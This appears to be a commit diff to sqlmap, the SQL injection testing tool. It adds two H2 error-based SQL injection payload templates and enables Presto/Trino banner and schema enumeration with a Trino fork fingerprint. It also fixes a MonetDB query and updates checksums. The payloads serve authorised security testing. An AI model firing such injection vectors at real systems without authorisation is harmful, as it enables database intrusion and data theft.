Minor patching

data/txt/sha256sums.txt

@@ -79,12 +79,12 @@ e2febc92f9686eacf17a0054f175917b783cc6638ca570435a5203b03245fc18  data/xml/banne
 a32fc8796082d2e45cfc969f0b45ad476bf87a8515d67b2fed77c5058df5a0f5  data/xml/boundaries.xml
 0baf0fade74d4ad294ee88ef306743da0c6a4631b8d640708809103ef9cf63ed  data/xml/errors.xml
 d0b094a110bccec97d50037cc51445191561c0722ec53bf2cebe1521786e2451  data/xml/payloads/boolean_blind.xml
-6ebf0da74b18c95aee4fd4fc2874bda4b3780dc4254806f3968b953fa01bdca1  data/xml/payloads/error_based.xml
+2da9159c066c66b47767f66e8c46ed94394f9511940c32e6adf454126197443b  data/xml/payloads/error_based.xml
 516a2ff314bba3ecf65d0371bf8c2654ad79b09c0737b1fe0f178d7885a9508d  data/xml/payloads/inline_query.xml
 0648264166455010921df1ec431e4c973809f37ef12cbfea75f95029222eb689  data/xml/payloads/stacked_queries.xml
 997556b6170964a64474a2e053abe33cf2cf029fb1acec660d4651cc67a3c7e1  data/xml/payloads/time_blind.xml
 40a4878669f318568097719d07dc906a19b8520bc742be3583321fc1e8176089  data/xml/payloads/union_query.xml
-38882b6ceb8bca59ce8ed927abe3b8840394c56b3881371c2103e229b8795040  data/xml/queries.xml
+f01093d5a1ff6a58653e7058a93e15801d9446f1f2c5de5b5d1054f17dd1ad44  data/xml/queries.xml
 e043101194219a2e4c8bc352f0d3a04b87e1c28b1bcd6c13f6d5d1c9e260b653  doc/ARCHITECTURE.md
 0f5a9c84cb57809be8759f483c7d05f54847115e715521ac0ecf390c0aa68465  doc/AUTHORS
 ce20a4b452f24a97fde7ec9ed816feee12ac148e1fde5f1722772cc866b12740  doc/CHANGELOG.md
@@ -177,7 +177,7 @@ c03dc585f89642cfd81b087ac2723e3e1bb3bfa8c60e6f5fe58ef3b0113ebfe6  lib/core/data.
 147823c37596bd6a56d677697781f34b8d1d1671d5a2518fbc9468d623c6d07d  lib/core/defaults.py
 2f44a1bfe6f18aafe64147b99e69aa93cf438c0e7befe59f4e2aee9065c8b7b6  lib/core/dicts.py
 2592b0fd38c272c0b0d49878f4449437eb8ba8ff7536bb39b2ac9a2511010f7c  lib/core/dump.py
-e4f92e09737ff0dda7ec30e0db1912570e252853b3af9b8f2b9f68ad33cf09fe  lib/core/enums.py
+6b6514202c6ca2d29069176bccf10492927d83e6ede06c9f4b4fcc6164e61856  lib/core/enums.py
 5387168e5dfedd94ae22af7bb255f27d6baaca50b24179c6b98f4f325f5cc7b4  lib/core/exception.py
 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3  lib/core/__init__.py
 914a13ee21fd610a6153a37cbe50830fcbd1324c7ebc1e7fc206d5e598b0f7ad  lib/core/log.py
@@ -189,7 +189,7 @@ ccc4a717e887652b1fcce073d9409d9c59a3b28548c703a9e453d15845f90cd7  lib/core/patch
 48797d6c34dd9bb8a53f7f3794c85f4288d82a9a1d6be7fcf317d388cb20d4b3  lib/core/replication.py
 0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6  lib/core/revision.py
 888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c  lib/core/session.py
-5edba86522bc49aa6caf80118fc560610e76cc7f35a3c3c09a8052747a3b97ef  lib/core/settings.py
+25506d477075d1a33849a4db1058e1fb0cc98100e714c1afa0e7e98cad2f2901  lib/core/settings.py
 cd5a66deee8963ba8e7e9af3dd36eb5e8127d4d68698811c29e789655f507f82  lib/core/shell.py
 bcb5d8090d5e3e0ef2a586ba09ba80eef0c6d51feb0f611ed25299fbb254f725  lib/core/subprocessng.py
 70ea3768f1b3062b22d20644df41c86238157ec80dd43da40545c620714273c6  lib/core/target.py
@@ -390,7 +390,7 @@ e9ef99b83542121ac4489526ecb90def4bba9ec62a0dd990bb39d7db387c5ff6  plugins/dbms/m
 8a9d30546e3e96295b59bb5e53b352d039f785e0fa8ae19b2073083f1555f45b  plugins/dbms/monetdb/connector.py
 ba04af3683b9a6e29e8fa6b3bf436a57e59435cebb042414f2df82018d91599e  plugins/dbms/monetdb/enumeration.py
 672dc9b3d291aa4f5d6c4cbe364e92b92e19ee6de86f6d9b9a4dda7d5611b409  plugins/dbms/monetdb/filesystem.py
-5fd3a9eb6210c32395e025e327bfeb24fd18f0cc7da554be526c7f2ae9af3f7d  plugins/dbms/monetdb/fingerprint.py
+7188530754349b765b9842ad8f416766fd7035f131ad6444156ae0de45efc8fe  plugins/dbms/monetdb/fingerprint.py
 05dc581f0fbed20030200e5c7bd45a971ad4e910c6502ad02cc6c26fd5937003  plugins/dbms/monetdb/__init__.py
 78f1ff4b82fd4af50e1fbdb81539862f1c31258cda212b39f4a8501960f1b95e  plugins/dbms/monetdb/syntax.py
 236fd244f0bbc3976b389429a8176feda6c243267564c2a0eff6fc2458c1b3f9  plugins/dbms/monetdb/takeover.py
@@ -423,9 +423,9 @@ bdb13225f822227c32051a296918b3ed423a0644ce0c962db13a0dc0e9636395  plugins/dbms/p
 4fce63dd766a35b7273351df2de706c37a0392479578705853b4333c119f2270  plugins/dbms/postgresql/syntax.py
 d3cb1ebaf594b30cebddd16a8dcf6cf33a3536c3da4caf7e4b9d8c910288eb8d  plugins/dbms/postgresql/takeover.py
 9a63ef08407c1f4686679343e733bfc124d287ebadf747db5ecbc3abed694462  plugins/dbms/presto/connector.py
-23e2fb4fc9c6b84d7503986f311da9c3a9c6eb261433f80be1e854144ebb15b4  plugins/dbms/presto/enumeration.py
+1c966d62ce361cf681202be88d839a9bd2677b1444e6998778151ab27647199e  plugins/dbms/presto/enumeration.py
 874532c0a1a09e2c3d6ea5f4b9e12552ce18ae04a8d13a9f8e099071760f4a73  plugins/dbms/presto/filesystem.py
-acd58559efbce9f94683260c45619286b5bb015ff5dbf39b9e8c9b286f34fbe8  plugins/dbms/presto/fingerprint.py
+338fbc37ae85f293f07461127dd1465a3ad6bc6bedcdb025ffac35df8bfc8949  plugins/dbms/presto/fingerprint.py
 5c104b3ee2e86bf29a8f446d7779470b42d173e87b672c43257289b0d798d2b1  plugins/dbms/presto/__init__.py
 859cc5b9be496fe35f2782743f8e573ff9d823de7e99b0d32dbc250c361c653e  plugins/dbms/presto/syntax.py
 98e28b754352529381b5cffdc701a1c08158d7e7466764310627280d51f744ba  plugins/dbms/presto/takeover.py

data/xml/payloads/error_based.xml

@@ -911,6 +911,44 @@
         </details>
     </test>
 
+    <test>
+        <title>H2 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (CAST)</title>
+        <stype>2</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' AS INT)</vector>
+        <request>
+            <payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]' AS INT)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>H2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>H2 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (CAST)</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' AS INT)</vector>
+        <request>
+            <payload>OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]' AS INT)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>H2</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Spanner AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
         <stype>2</stype>

data/xml/queries.xml

@@ -1136,9 +1136,9 @@
         <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
         <hex query="TO_HEX(%s)"/>
         <inference query="CODEPOINT(SUBSTR((%s),%d,1))>%d" dbms_version="&gt;=0.178" query2="SUBSTR((%s),%d,1)>'%c'"/>/>
-        <banner/>
+        <banner query="version()"/>
         <current_user query="CURRENT_USER"/>
-        <current_db/>
+        <current_db query="current_schema"/>
         <hostname/>
         <table_comment query="SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' AND table_name='%s'"/>
         <column_comment query="SELECT column_comment FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s' AND table_name='%s' AND column_name='%s'"/>
@@ -1424,7 +1424,7 @@
         <passwords/>
         <privileges>
             <inband query="SELECT grantee,type FROM sys.privileges" condition="grantee"/>
-            <blind query="SELECT DISTINCT(type) FROM sys.privileges WHERE grantee %s '%s' LIMIT 1 OFFSET %d" count="SELECT COUNT(DISTINCT(type)) FROM sys.privileges WHERE grantee %s '%s'"/>
+            <blind query="SELECT DISTINCT(type) FROM sys.privileges WHERE grantee='%s' ORDER BY 1 LIMIT 1 OFFSET %d" count="SELECT COUNT(DISTINCT(type)) FROM sys.privileges WHERE grantee='%s'"/>
         </privileges>
         <roles/>
         <statements>

lib/core/enums.py

@@ -114,6 +114,7 @@ class FORK(object):
     DM8 = "DM8"
     DORIS = "Doris"
     STARROCKS = "StarRocks"
+    TRINO = "Trino"
 
 class CUSTOM_LOGGING(object):
     PAYLOAD = 9

lib/core/settings.py

@@ -20,7 +20,7 @@ from lib.core.enums import OS
 from thirdparty import six
 
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.10.6.123"
+VERSION = "1.10.6.124"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)

plugins/dbms/monetdb/fingerprint.py

@@ -68,7 +68,7 @@ class Fingerprint(GenericFingerprint):
         infoMsg = "testing %s" % DBMS.MONETDB
         logger.info(infoMsg)
 
-        result = inject.checkBooleanExpression("isaurl(NULL)=false")
+        result = inject.checkBooleanExpression("isaurl(NULL) IS NULL")
 
         if result:
             infoMsg = "confirming %s" % DBMS.MONETDB

plugins/dbms/presto/enumeration.py

@@ -9,15 +9,8 @@ from lib.core.data import logger
 from plugins.generic.enumeration import Enumeration as GenericEnumeration
 
 class Enumeration(GenericEnumeration):
-    def getBanner(self):
-        warnMsg = "on Presto it is not possible to get the banner"
-        logger.warning(warnMsg)
-
-        return None
-
-    def getCurrentDb(self):
-        warnMsg = "on Presto it is not possible to get name of the current database (schema)"
-        logger.warning(warnMsg)
+    # NOTE: getBanner()/getCurrentDb() are intentionally NOT overridden - modern Presto/Trino expose
+    # version() and current_schema (wired in queries.xml), so the generic implementations work.
 
     def isDba(self, user=None):
         warnMsg = "on Presto it is not possible to test if current user is DBA"

plugins/dbms/presto/fingerprint.py

@@ -7,10 +7,14 @@ See the file 'LICENSE' for copying permission
 
 from lib.core.common import Backend
 from lib.core.common import Format
+from lib.core.common import hashDBRetrieve
+from lib.core.common import hashDBWrite
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.enums import DBMS
+from lib.core.enums import FORK
+from lib.core.enums import HASHDB_KEYS
 from lib.core.session import setDbms
 from lib.core.settings import PRESTO_ALIASES
 from lib.request import inject
@@ -21,6 +25,18 @@ class Fingerprint(GenericFingerprint):
         GenericFingerprint.__init__(self, DBMS.PRESTO)
 
     def getFingerprint(self):
+        fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK)
+
+        if fork is None:
+            # Trino (the PrestoSQL fork) exposes functions PrestoDB never added (e.g. SOUNDEX),
+            # so a NULL-based probe on one of them distinguishes the fork from the original.
+            if inject.checkBooleanExpression("SOUNDEX(NULL) IS NULL"):
+                fork = FORK.TRINO
+            else:
+                fork = ""
+
+            hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork)
+
         value = ""
         wsOsFp = Format.getOs("web server", kb.headersFp)
 
@@ -37,6 +53,8 @@ class Fingerprint(GenericFingerprint):
 
         if not conf.extensiveFp:
             value += DBMS.PRESTO
+            if fork:
+                value += " (%s fork)" % fork
             return value
 
         actVer = Format.getDbms()
@@ -55,6 +73,9 @@ class Fingerprint(GenericFingerprint):
         if htmlErrorFp:
             value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
 
+        if fork:
+            value += "\n%sfork fingerprint: %s" % (blank, fork)
+
         return value
 
     def checkDbms(self):